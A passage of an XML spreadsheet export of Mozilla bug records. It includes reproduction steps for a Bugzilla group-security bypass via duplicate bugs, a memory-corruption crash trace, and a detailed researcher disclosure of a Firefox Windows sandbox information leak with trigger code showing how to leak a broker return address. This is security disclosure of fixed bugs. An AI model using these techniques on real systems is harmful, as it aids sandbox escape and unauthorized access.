        </is>
      </c>
      <c r="O5196" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5196" t="inlineStr"/>
      <c r="Q5196" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5196" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5196" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5196" t="n">
        <v>1</v>
      </c>
      <c r="U5196" t="n">
        <v>0</v>
      </c>
      <c r="V5196" t="n">
        <v>14</v>
      </c>
      <c r="W5196" t="inlineStr">
        <is>
          <t>This is intermittent failing on Travis/desktopb2g, probably 1 in 100 failures so run it on a x100 loop to see if you can replicate it.
The traceback is that in the final assertion there is still a contact on the device.
It looks like it might need a bit stronger explicit wait after `tap_delete_confirm` , for example waiting for the Edit Contact panel to have slid out of position.
Similarly it could be a legitimate test failure and the contact is not deleted so check in the console for some kind of error message.</t>
        </is>
      </c>
      <c r="X5196" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5197">
      <c r="A5197" t="n">
        <v>96085</v>
      </c>
      <c r="B5197" t="inlineStr">
        <is>
          <t>2001-08-20 11:20:24 -0700</t>
        </is>
      </c>
      <c r="C5197" t="inlineStr">
        <is>
          <t>bypassing group security checks using duplicate bugs</t>
        </is>
      </c>
      <c r="D5197" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:25 -0800</t>
        </is>
      </c>
      <c r="E5197" t="n">
        <v>1</v>
      </c>
      <c r="F5197" t="n">
        <v>1</v>
      </c>
      <c r="G5197" t="n">
        <v>4</v>
      </c>
      <c r="H5197" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5197" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5197" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K5197" t="inlineStr">
        <is>
          <t>2.13</t>
        </is>
      </c>
      <c r="L5197" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5197" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5197" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5197" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5197" t="inlineStr"/>
      <c r="Q5197" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5197" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5197" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T5197" t="n">
        <v>1</v>
      </c>
      <c r="U5197" t="n">
        <v>0</v>
      </c>
      <c r="V5197" t="n">
        <v>26</v>
      </c>
      <c r="W5197" t="inlineStr">
        <is>
          <t>Its possible for the bugzilla group security stuff to be bypassed by filing a
duplicate bug. This will add you to the cc list, and so, by default, you'll be
able to see the bug.
To reproduce:
1. Have a restricted bug which is open to people on the cclist
(http://landfill.tequilarista.org/bugzilla-tip/show_bug.cgi?id=278)
2. As a user not in that group, file a bug, and dupe it against the bug which
you cannot see (http://landfill.tequilarista.org/bugzilla-tip/show_bug.cgi?id=279)
3. You can now view bug 278</t>
        </is>
      </c>
      <c r="X5197" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5198">
      <c r="A5198" t="n">
        <v>906662</v>
      </c>
      <c r="B5198" t="inlineStr">
        <is>
          <t>2013-08-19 06:39:17 -0700</t>
        </is>
      </c>
      <c r="C5198" t="inlineStr">
        <is>
          <t>Fix openAboutHomeTab to work with the changes to the tablet about:home UI</t>
        </is>
      </c>
      <c r="D5198" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E5198" t="n">
        <v>1</v>
      </c>
      <c r="F5198" t="n">
        <v>1</v>
      </c>
      <c r="G5198" t="n">
        <v>6</v>
      </c>
      <c r="H5198" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5198" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J5198" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5198" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5198" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M5198" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5198" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5198" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5198" t="inlineStr">
        <is>
          <t>[fixed-fig]</t>
        </is>
      </c>
      <c r="Q5198" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5198" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5198" t="inlineStr">
        <is>
          <t>Firefox 26</t>
        </is>
      </c>
      <c r="T5198" t="n">
        <v>1</v>
      </c>
      <c r="U5198" t="n">
        <v>0</v>
      </c>
      <c r="V5198" t="n">
        <v>6</v>
      </c>
      <c r="W5198" t="inlineStr">
        <is>
          <t>Created attachment 792189
openAboutHomeTabFix.patch
It seems that waitForEnabledText does not work anymore for this test since in the Tablet UI  the tabs titles are now always enabled. I am adding a waitForAboutHomeTab method to wait for the tab to be changed after dragging left or right. This should fix the fails of testWebContentContextMenu.</t>
        </is>
      </c>
      <c r="X5198" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5199">
      <c r="A5199" t="n">
        <v>1234949</v>
      </c>
      <c r="B5199" t="inlineStr">
        <is>
          <t>2015-12-23 14:34:07 -0800</t>
        </is>
      </c>
      <c r="C5199" t="inlineStr">
        <is>
          <t>Service Worker - Memory corruption in ServiceWorkerManager::ClaimClients</t>
        </is>
      </c>
      <c r="D5199" t="inlineStr">
        <is>
          <t>2024-05-30 09:08:02 -0700</t>
        </is>
      </c>
      <c r="E5199" t="n">
        <v>1</v>
      </c>
      <c r="F5199" t="n">
        <v>1</v>
      </c>
      <c r="G5199" t="n">
        <v>3</v>
      </c>
      <c r="H5199" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5199" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5199" t="inlineStr">
        <is>
          <t>DOM: Service Workers</t>
        </is>
      </c>
      <c r="K5199" t="inlineStr">
        <is>
          <t>46 Branch</t>
        </is>
      </c>
      <c r="L5199" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5199" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N5199" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5199" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5199" t="inlineStr">
        <is>
          <t>[fixed in bug 1241531][adv-main45+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5199" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5199" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5199" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5199" t="n">
        <v>1</v>
      </c>
      <c r="U5199" t="n">
        <v>0</v>
      </c>
      <c r="V5199" t="n">
        <v>42</v>
      </c>
      <c r="W5199" t="inlineStr">
        <is>
          <t>Using Clients API in Service Workers can trigger memory corruption in ServiceWorkerManager::ClaimClients().
Firefox crashes by executing invalid address:
First-chance exception at 0x043E0FF8 (xul.dll) in firefox.exe: 0xC0000005: Access violation executing location 0x043E0FF8.
Unhandled exception at 0x043E0FF8 (xul.dll) in firefox.exe: 0xC0000005: Access violation executing location 0x043E0FF8.
Call Stack:
 	xul.dll!043e0ff8()	C++
&gt;	xul.dll!nsQueryInterface::operator()(const nsID &amp; aIID, void * * aAnswer) Line 19	C++
 	xul.dll!nsCOMPtr_base::assign_from_qi(const nsQueryInterface aQI, const nsID &amp; aIID) Line 62	C++
 	xul.dll!mozilla::dom::workers::ServiceWorkerManager::ClaimClients(nsIPrincipal * aPrincipal, const nsCString &amp; aScope, unsigned __int64 aId) Line 3687	C++
 	xul.dll!`anonymous namespace'::ClaimRunnable::Run() Line 205	C++
 	xul.dll!nsThread::ProcessNextEvent(bool aMayWait, bool * aResult) Line 964	C++
 	xul.dll!NS_ProcessNextEvent(nsIThread * aThread, bool aMayWait) Line 297	C++
 	xul.dll!mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate * aDelegate) Line 95	C++
 	xul.dll!MessageLoop::RunHandler() Line 228	C++
 	xul.dll!MessageLoop::Run() Line 202	C++
 	xul.dll!nsBaseAppShell::Run() Line 158	C++
 	xul.dll!nsAppShell::Run() Line 259	C++
 	xul.dll!nsAppStartup::Run() Line 282	C++
 	xul.dll!XREMain::XRE_mainRun() Line 4298	C++
 	xul.dll!NS_TableDrivenQI(void * aThis, const nsID &amp; aIID, void * * aInstancePtr, const QITableEntry * aEntries) Line 18	C++
 	xul.dll!nsComponentManagerImpl::QueryInterface(const nsID &amp; aIID, void * * aInstancePtr) Line 969	C++
 	xul.dll!nsQueryInterface::operator()(const nsID &amp; aIID, void * * aAnswer) Line 19	C++
 	xul.dll!nsCOMPtr_base::assign_from_qi(const nsQueryInterface aQI, const nsID &amp; aIID) Line 62	C++
The virtual function table was corrupted and points to an invalid address:
-		this	0x2ef11370 {mRawPtr=0x2ef01808 {...} }	const nsQueryInterface *
-		mRawPtr	0x2ef01808 {...}	nsISupports *
-		__vfptr	0x043e0ff8 {xul.dll!mozilla::dom::DOMIfaceAndProtoJSClass PrototypeClass} {0x043e4658 {xul.dll!`string'} "DOMExceptionPrototype", ...}	void * *
		[0]	0x043e4658 {xul.dll!`string'} "DOMExceptionPrototype"	void *
		[1]	0x00400000	void *
		[2]	0x00000000	void *
+		aIID	{m0=1124576232 m1=21382 m2=16420 ...}	const nsID &amp;
+		aAnswer	0x0062f34c {0x0062f390}	void * *</t>
        </is>
      </c>
      <c r="X5199" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5200">
      <c r="A5200" t="n">
        <v>1534196</v>
      </c>
      <c r="B5200" t="inlineStr">
        <is>
          <t>2019-03-11 01:45:17 -0700</t>
        </is>
      </c>
      <c r="C5200" t="inlineStr">
        <is>
          <t>information disclosure due to an incorrect return value in `FileSystemPolicy::OpenFileAction`</t>
        </is>
      </c>
      <c r="D5200" t="inlineStr">
        <is>
          <t>2024-05-30 09:57:18 -0700</t>
        </is>
      </c>
      <c r="E5200" t="n">
        <v>1</v>
      </c>
      <c r="F5200" t="n">
        <v>1</v>
      </c>
      <c r="G5200" t="n">
        <v>3</v>
      </c>
      <c r="H5200" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5200" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5200" t="inlineStr">
        <is>
          <t>Security: Process Sandboxing</t>
        </is>
      </c>
      <c r="K5200" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5200" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5200" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5200" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5200" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5200" t="inlineStr">
        <is>
          <t>[see comment 28 for credit][reporter-external] [client-bounty-form][will be publicly disclosed 08th June 2019][adv-main67+][adv-esr60.7+]</t>
        </is>
      </c>
      <c r="Q5200" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5200" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5200" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T5200" t="n">
        <v>1</v>
      </c>
      <c r="U5200" t="n">
        <v>0</v>
      </c>
      <c r="V5200" t="n">
        <v>33</v>
      </c>
      <c r="W5200" t="inlineStr">
        <is>
          <t># Firefox sandbox information disclosure
## Summary
The `crosscall` `FilesystemDispatcher::NtOpenFile` can leak an uninitialized handle value to a renderer due to an incorrect return value in `FileSystemPolicy::OpenFileAction`. The crosscall `NtOpenKey` seems to also suffer from the exact same bug.
In this write-up, we show how to leak a function pointer stored in the broker's stack (corresponding, in this case, to a return address). 
We'll first have a glance at a `crosscall` implementation, from the renderer to the broker. 
Then, we'll explain where the bug lies before eventually explaining how to trigger the bug and find a way to disclose a function pointer.
[TOC]
## Affected versions
The bug is specific to the `Windows` implementation of the sandbox. 
Both `x86` and `x64` builds are affected.
## About sandboxing
On Windows, browsers usually have a sandbox where there is one main normally privileged process and several processes running at a lower privilege level. The basic idea is that every tab would execute in a restricted environment so that compromising this process would not give an attacker a complete access to its target's machine. He would need to also evade the sandbox. 
To implement that, browsers make use of different mechanisms provided by the operating system such as restricted tokens, low integrity levels, job objects or station/desktop isolation. 
In order to be able to do operations, a renderer process will likely have to ask the broker to do it for him using an IPC mechanism. 
When trying to do system calls, a renderer might instead do what is called a `crosscall`. This means that instead of directly making a system call, a renderer will send a message asking the broker to do it for him. Depending on the policy, the broker may or may not execute the system call and send the result back to the renderer, through IPC.
## About `crosscalls`
When setting up the sandbox, renderer-side functions in ntdll like `ntdll!NtCreateFile` are hooked so as to redirect execution to the interception functions implementing the crosscall. Those functions write data in memory and signal the broker to make a crosscall. 
Then, the broker executes dispatcher functions that does the actual syscall and sends the result back to the renderer through shared memory.
## Renderer-side interception of `NtCreateFile`
If we take the case of `ntdll!NtCreateFile`, the renderer will actually end up executing `TargetNtCreateFile`.  What is does is the following : 
1. Call the original syscall
2. If the resulting `NTSTATUS` code is either `STATUS_ACCESS_DENIED` or `STATUS_NETWORK_OPEN_RESTRICTION`
   1. Validate parameters 
   2. Prepare shared memory
   3. Send a signal to actually make the crosscall using the function `CrossCall`
```c++
// source/security/sandbox/chromium/sandbox/win/src/filesystem_interception.cc
NTSTATUS WINAPI TargetNtCreateFile(NtCreateFileFunction orig_CreateFile,
                                   PHANDLE file, ACCESS_MASK desired_access,
                                   POBJECT_ATTRIBUTES object_attributes,
                                   PIO_STATUS_BLOCK io_status,
                                   PLARGE_INTEGER allocation_size,
                                   ULONG file_attributes, ULONG sharing,
                                   ULONG disposition, ULONG options,
                                   PVOID ea_buffer, ULONG ea_length) {
  // Check if the process can open it first.
  NTSTATUS status = orig_CreateFile(file, desired_access, object_attributes,
                                    io_status, allocation_size,
                                    file_attributes, sharing, disposition,
                                    options, ea_buffer, ea_length);
  if (STATUS_ACCESS_DENIED != status &amp;&amp;
      STATUS_NETWORK_OPEN_RESTRICTION != status)
    return status;
  mozilla::sandboxing::LogBlocked("NtCreateFile",
                                  object_attributes-&gt;ObjectName-&gt;Buffer,
                                  object_attributes-&gt;ObjectName-&gt;Length);
  // We don't trust that the IPC can work this early.
  if (!SandboxFactory::GetTargetServices()-&gt;GetState()-&gt;InitCalled())
    return status;
  wchar_t* name = NULL;
  do {
    if (!ValidParameter(file, sizeof(HANDLE), WRITE))
      break;
    if (!ValidParameter(io_status, sizeof(IO_STATUS_BLOCK), WRITE))
      break;
    void* memory = GetGlobalIPCMemory();
    if (NULL == memory)
      break;
    uint32_t attributes = 0;
    NTSTATUS ret = AllocAndCopyName(object_attributes, &amp;name, &amp;attributes,
                                    NULL);
    if (!NT_SUCCESS(ret) || NULL == name)
      break;
    uint32_t desired_access_uint32 = desired_access;
    uint32_t options_uint32 = options;
    uint32_t disposition_uint32 = disposition;
    uint32_t broker = FALSE;
    CountedParameterSet&lt;OpenFile&gt; params;
    params[OpenFile::NAME] = ParamPickerMake(name);
    params[OpenFile::ACCESS] = ParamPickerMake(desired_access_uint32);
    params[OpenFile::DISPOSITION] = ParamPickerMake(disposition_uint32);
    params[OpenFile::OPTIONS] = ParamPickerMake(options_uint32);
    params[OpenFile::BROKER] = ParamPickerMake(broker);
    SharedMemIPCClient ipc(memory);
    CrossCallReturn answer = {0};
    // The following call must match in the parameters with
    // FilesystemDispatcher::ProcessNtCreateFile.
    ResultCode code = CrossCall(ipc, IPC_NTCREATEFILE_TAG, name, attributes,
                                desired_access_uint32, file_attributes, sharing,
                                disposition, options_uint32, &amp;answer);
    if (SBOX_ALL_OK != code)
      break;
    status = answer.nt_status;
    if (!NT_SUCCESS(answer.nt_status))
      break;
    __try {
      *file = answer.handle;
      io_status-&gt;Status = answer.nt_status;
      io_status-&gt;Information = answer.extended[0].ulong_ptr;
    } __except(EXCEPTION_EXECUTE_HANDLER) {
      break;
    }
    mozilla::sandboxing::LogAllowed("NtCreateFile",
                                    object_attributes-&gt;ObjectName-&gt;Buffer,
                                    object_attributes-&gt;ObjectName-&gt;Length);
  } while (false);
  if (name)
    operator delete(name, NT_ALLOC);
  return status;
}
```
## Broker-side dispatcher of `NtCreateFile`
After the renderer called `CrossCall` so as to make an `NtCreateFile` crosscall, the broker is going to execute the function `FilesystemDispatcher::NtCreateFile`.
After a few checks and evaluating the low level policy, it will eventually call the `FileSystemPolicy::CreateFileAction`. This is where the actual syscall will be made.
###  `FilesystemDispatcher::NtCreateFile`
```c++
// source/security/sandbox/chromium/sandbox/win/src/filesystem_dispatcher.cc
bool FilesystemDispatcher::NtCreateFile(IPCInfo* ipc,
                                        base::string16* name,
                                        uint32_t attributes,
                                        uint32_t desired_access,
                                        uint32_t file_attributes,
                                        uint32_t share_access,
                                        uint32_t create_disposition,
                                        uint32_t create_options) {
  if (!PreProcessName(name)) {
    // The path requested might contain a reparse point.
    ipc-&gt;return_info.nt_status = STATUS_ACCESS_DENIED;
    return true;
  }
  const wchar_t* filename = name-&gt;c_str();
  uint32_t broker = TRUE;
  CountedParameterSet&lt;OpenFile&gt; params;
  params[OpenFile::NAME] = ParamPickerMake(filename);
  params[OpenFile::ACCESS] = ParamPickerMake(desired_access);
  params[OpenFile::DISPOSITION] = ParamPickerMake(create_disposition);
  params[OpenFile::OPTIONS] = ParamPickerMake(create_options);
  params[OpenFile::BROKER] = ParamPickerMake(broker);
  // To evaluate the policy we need to call back to the policy object. We
  // are just middlemen in the operation since is the FileSystemPolicy which
  // knows what to do.
  EvalResult result = policy_base_-&gt;EvalPolicy(IPC_NTCREATEFILE_TAG,
                                               params.GetBase());
  // If the policies forbid access (any result other than ASK_BROKER),
  // then check for user-granted access to file.
  if (ASK_BROKER != result &amp;&amp;
      mozilla::sandboxing::PermissionsService::GetInstance()-&gt;
        UserGrantedFileAccess(ipc-&gt;client_info-&gt;process_id, filename,
                              desired_access, create_disposition)) {
    result = ASK_BROKER;
  }
  HANDLE handle;
  ULONG_PTR io_information = 0;
  NTSTATUS nt_status;
  if (!FileSystemPolicy::CreateFileAction(result, *ipc-&gt;client_info, *name,
                                          attributes, desired_access,
                                          file_attributes, share_access,
                                          create_disposition, create_options,
                                          &amp;handle, &amp;nt_status,
                                          &amp;io_information)) {
    ipc-&gt;return_info.nt_status = STATUS_ACCESS_DENIED;
    return true;
  }
  // Return operation status on the IPC.
  ipc-&gt;return_info.extended[0].ulong_ptr = io_information;
  ipc-&gt;return_info.nt_status = nt_status;
  ipc-&gt;return_info.handle = handle;
  return true;
}
```
###  `FileSystemPolicy::CreateFileAction`
Here, `NtCreateFileInTarget` will do the actual system call.
```c++
// source/security/sandbox/chromium/sandbox/win/src/filesystem_policy.cc
bool FileSystemPolicy::CreateFileAction(EvalResult eval_result,
                                        const ClientInfo&amp; client_info,
                                        const base::string16&amp; file,
                                        uint32_t attributes,
                                        uint32_t desired_access,
                                        uint32_t file_attributes,
                                        uint32_t share_access,
                                        uint32_t create_disposition,
                                        uint32_t create_options,
                                        HANDLE* handle,
                                        NTSTATUS* nt_status,
                                        ULONG_PTR* io_information) {
  // The only action supported is ASK_BROKER which means create the requested
  // file as specified.
  if (ASK_BROKER != eval_result) {
    *nt_status = STATUS_ACCESS_DENIED;
    return false;
  }
  IO_STATUS_BLOCK io_block = {};
  UNICODE_STRING uni_name = {};
  OBJECT_ATTRIBUTES obj_attributes = {};
  SECURITY_QUALITY_OF_SERVICE security_qos = GetAnonymousQOS();
  InitObjectAttribs(file, attributes, NULL, &amp;obj_attributes,
                    &amp;uni_name, IsPipe(file) ? &amp;security_qos : NULL);
  *nt_status = NtCreateFileInTarget(handle, desired_access, &amp;obj_attributes,
                                    &amp;io_block, file_attributes, share_access,
                                    create_disposition, create_options, NULL,
                                    0, client_info.process);
  *io_information = io_block.Information;
  return true;
}
```
## The bug
Let's compare both `OpenFileAction` to `CreateFileAccess
`
```c++
// source/security/sandbox/chromium/sandbox/win/src/filesystem_policy.cc
bool FileSystemPolicy::OpenFileAction(EvalResult eval_result,
                                      const ClientInfo&amp; client_info,
                                      const base::string16&amp; file,
                                      uint32_t attributes,
                                      uint32_t desired_access,
                                      uint32_t share_access,
                                      uint32_t open_options,
                                      HANDLE* handle,
                                      NTSTATUS* nt_status,
                                      ULONG_PTR* io_information) {
  // The only action supported is ASK_BROKER which means open the requested
  // file as specified.
  if (ASK_BROKER != eval_result) {
    *nt_status = STATUS_ACCESS_DENIED;
    return true; // this line is different!
  }
  // An NtOpen is equivalent to an NtCreate with FileAttributes = 0 and
  // CreateDisposition = FILE_OPEN.
  IO_STATUS_BLOCK io_block = {};
  UNICODE_STRING uni_name = {};
  OBJECT_ATTRIBUTES obj_attributes = {};
  SECURITY_QUALITY_OF_SERVICE security_qos = GetAnonymousQOS();
  InitObjectAttribs(file, attributes, NULL, &amp;obj_attributes,
                    &amp;uni_name, IsPipe(file) ? &amp;security_qos : NULL);
  *nt_status = NtCreateFileInTarget(handle, desired_access, &amp;obj_attributes,
                                    &amp;io_block, 0, share_access, FILE_OPEN,
                                    open_options, NULL, 0,
                                    client_info.process);
  *io_information = io_block.Information;
  return true;
}
```
In `OpenFileAction`, the following code is incorrect: 
```c++
  if (ASK_BROKER != eval_result) {
    *nt_status = STATUS_ACCESS_DENIED;
    return true;
  }
```
The return value should be `false` instead of `true`.
`OpenFileAction` is called by the `FilesystemDispatcher::NtOpenFile` crosscall as follows : 
```c++
bool FilesystemDispatcher::NtOpenFile(IPCInfo* ipc,
                                      base::string16* name,
                                      uint32_t attributes,
                                      uint32_t desired_access,
                                      uint32_t share_access,
                                      uint32_t open_options) {
  // [...]
  HANDLE handle; // not initialized
  ULONG_PTR io_information = 0;
  NTSTATUS nt_status;
  // can bail out early without modifying handle and while also returning true
  if (!FileSystemPolicy::OpenFileAction(result, *ipc-&gt;client_info, *name,
                                        attributes, desired_access,
                                        share_access, open_options, &amp;handle,
                                        &amp;nt_status, &amp;io_information)) {
    ipc-&gt;return_info.nt_status = STATUS_ACCESS_DENIED;
    return true;
  }
  // Return operation status on the IPC.
  ipc-&gt;return_info.extended[0].ulong_ptr = io_information;
  ipc-&gt;return_info.nt_status = nt_status;
  ipc-&gt;return_info.handle = handle; // handle can be uninitialized here
  return true;
}
```
When the condition `ASK_BROKER != eval_result` is `true`,  access to the file is denied and the broker should then execute
```c++
    ipc-&gt;return_info.nt_status = STATUS_ACCESS_DENIED;
    return true;
```
But as we saw previously, that is not case and we would therefore execute the following lines : 
```c++
  ipc-&gt;return_info.extended[0].ulong_ptr = io_information;
  ipc-&gt;return_info.nt_status = nt_status;
  ipc-&gt;return_info.handle = handle;
```
`io_information` is set to 0 and nt_status would be set to `STATUS_ACCESS_DENIED`.
However the handle is not initialized! Therefore, the broker will put some uninitialized stack memory in the shared memory when executing `ipc-&gt;return_info.handle = handle`
## Leaking the broker's memory
### Triggering the bug
Long story short, to trigger the bug, you only need to make an `NtOpenFile` crosscall on a file for which access would be denied.
It is required to manually read the shared memory or do the call to `CrossCall` directly because `TargetNtOpenFile` checks `answer.nt_status` and does not fetch shared memory the the `nt_status` is an error code (which is what we expect). The line `*file = answer.handle;` would not get executed. 
But as this is renderer code, you can do whatever you want. Either call `CrossCall` (or make your own) or scan the shared memory.
```c++
ResultCode code = CrossCall(ipc, IPC_NTOPENFILE_TAG, name, attributes,
                                desired_access_uint32, sharing, options_uint32,
                                &amp;answer);
    if (SBOX_ALL_OK != code)
      break;
    status = answer.nt_status;
    if (!NT_SUCCESS(answer.nt_status)) // (renderer side) nt_status != NT_SUCCESS
      break;
    __try {
      *file = answer.handle; // here you would fetch the leaked data from the shared memory
      io_status-&gt;Status = answer.nt_status;
      io_status-&gt;Information = answer.extended[0].ulong_ptr;
    } __except(EXCEPTION_EXECUTE_HANDLER) {
      break;
    }
```
The trigger would roughly look like this. 
```c++
RtlInitUnicodeString(&amp;filename, L"\\??\\C:\\");
InitializeObjectAttributes(&amp;obj_attr, &amp;filename, OBJ_CASE_INSENSITIVE, NULL, NULL);
NtOpenFile(&amp;file, FILE_WRITE_DATA, &amp;obj_attr, &amp;iostatusblock, 1, NULL);
readSharedMemory()
```
### Getting a function pointer
We need to make sure that the stack contains something interesting. If you try to open the file `L"\\??\\C:\\secret\\canttouchme.txt"`, you would not get anything interesting. The return handle would actually be the number of characters of the file name (in this case, 0x1D).
Indeed, when receiving the signal for a crosscall, the broker would first execute the function `sandbox::SharedMemIPCServer::InvokeCallback`.
```c++
bool SharedMemIPCServer::InvokeCallback(const ServerControl* service_context,
                                        void* ipc_buffer,
                                        CrossCallReturn* call_result) {
// [...]
  if (!GetArgs(params.get(), &amp;ipc_params, args))
    return false;
// [...]
  if (handler) {
    switch (params-&gt;GetParamsCount()) {
// [...]
      case 7: {
        Dispatcher::Callback7 callback =
            reinterpret_cast&lt;Dispatcher::Callback7&gt;(callback_generic);
        if (!(handler-&gt;*callback)(&amp;ipc_info, args[0], args[1], args[2], args[3],
                                  args[4], args[5], args[6]))
          break;
        error = false;
        break;
      }
// [...]
}
```
The function `GetArgs` will fetch the arguments from the shared memory. 
For every argument,  it will call a function `GetRawParameterXXX`. 
Henceforth, when fetching the filename parameter, `GetParameterStr`will get called.
```c++
// Fills up the list of arguments (args and ipc_params) for an IPC call.
bool GetArgs(CrossCallParamsEx* params, IPCParams* ipc_params,
             void* args[kMaxIpcParams]) {
  // [...]
  for (uint32_t i = 0; i &lt; params-&gt;GetParamsCount(); i++) {
    uint32_t size;
    ArgType type;
    args[i] = params-&gt;GetRawParameter(i, &amp;size, &amp;type);
    if (args[i]) {
      ipc_params-&gt;args[i] = type;
      switch (type) {
        case WCHAR_TYPE: {
          std::unique_ptr&lt;base::string16&gt; data(new base::string16);
          if (!params-&gt;GetParameterStr(i, data.get())) {
            args[i] = 0;
            ReleaseArgs(ipc_params, args);
            return false;
          }
          args[i] = data.release();
          break;
        }
        // [...]
      }
    }
  }
  return true;
}
```
The code of `GetParameterStr` is the following : 
```c++
bool CrossCallParamsEx::GetParameterStr(uint32_t index,
                                        base::string16* string) {
 // [...]
  void* start = GetRawParameter(index, &amp;size, &amp;type);
 // [...]
  string-&gt;append(reinterpret_cast&lt;wchar_t*&gt;(start), size/(sizeof(wchar_t)));
  return true;
}
```
If you read the disassembly, you find the following instructions : 
```asm
mov     ebx, [esi+14h]
mov     edx, [esi+10h]
mov     edi, eax
shr     edi, 1
mov     [ebp+var_18], ebx
sub     ebx, edx
cmp     ebx, edi
jnb     short loc_4162A0
```
Thoses instructions check if the length of the file name is greater than the length of the parameter string. When debugging, we see than the original capacity of the string is of 7 characters. So we compare the number of characters of the file name to 7.
In the case of a greater string such as `L"\\??\\C:\\secret\\canttouchme.txt"`,  the following basic block is executed.
```asm
sub     esp, 10h
mov     al, [ebp+var_14]
mov     [esp+28h+var_24], al
mov     [esp+28h+var_20], ecx
mov     ecx, esi
mov     [esp+28h+var_1C], edi
mov     [esp+28h+same_address_as_the_uninitialized_handle], edi // look here!
call    std::basic_string&lt;wchar_t,std::char_traits&lt;wchar_t&gt;,std::allocator&lt;wchar_t&gt;&gt;::_Reallocate_grow_by&lt;`std::basic_string&lt;wchar_t,std::char_traits&lt;wchar_t&gt;,std::allocator&lt;wchar_t&gt;&gt;::append(wchar_t const * const,uint)'::`1'::_lambda_1_,wchar_t const *,uint&gt;(uint,`std::basic_string&lt;wchar_t,std::char_traits&lt;wchar_t&gt;,std::allocator&lt;wchar_t&gt;&gt;::append(wchar_t const * const,uint)'::`1'::_lambda_1_,wchar_t const *,uint)
jmp     short loc_416284
```
This will store the number of characters of the file name string. This is something an attacker does not want to happen because it is a completely irrelevant information.
But what happens if the string is smaller? A valid file name could be `L"\\??\\C:\\"`.
The following lines would get executed instead : 
```asm
loc_4162AD:
and     eax, 0FFFFFFFEh
lea     edx, [esi+edx*2]
push    eax             ; Size
push    ecx             ; Src
push    edx             ; Dst
call    _memmove // return address == uninitialized handle value
add     esp, 0Ch  
```
This is a much better thing because it doesn't write the string length on the address that will later correspond to the uninitialized handle.
 Let's do an NtOpenFile crosscall with the filename  `L"\\??\\C:\\"` and use `FILE_WRITE_DATA` as a `DesiredAccessMask` like this :
```c++
NtOpenFileStruct(&amp;file, FILE_WRITE_DATA, &amp;obj_attrib, &amp;io_status_block, 1, NULL);
```
Now have a look at the leaking handle and see what it belong when attaching to the broker process. 
```
0:069&gt; ln 002662bb
Browse module
Set bu breakpoint
*** WARNING: Unable to verify checksum for c:\mozilla-source\mozilla-central\obj-i686-pc-mingw32\dist\bin\firefox.exe
 [c:\mozilla-source\mozilla-central\security\sandbox\chromium\sandbox\win\src\crosscall_server.cc @ 293] (00266200)   firefox!sandbox::CrossCallParamsEx::GetParameterStr+0xbb   |  (002662d0)   firefox!sandbox::SetCallError
```
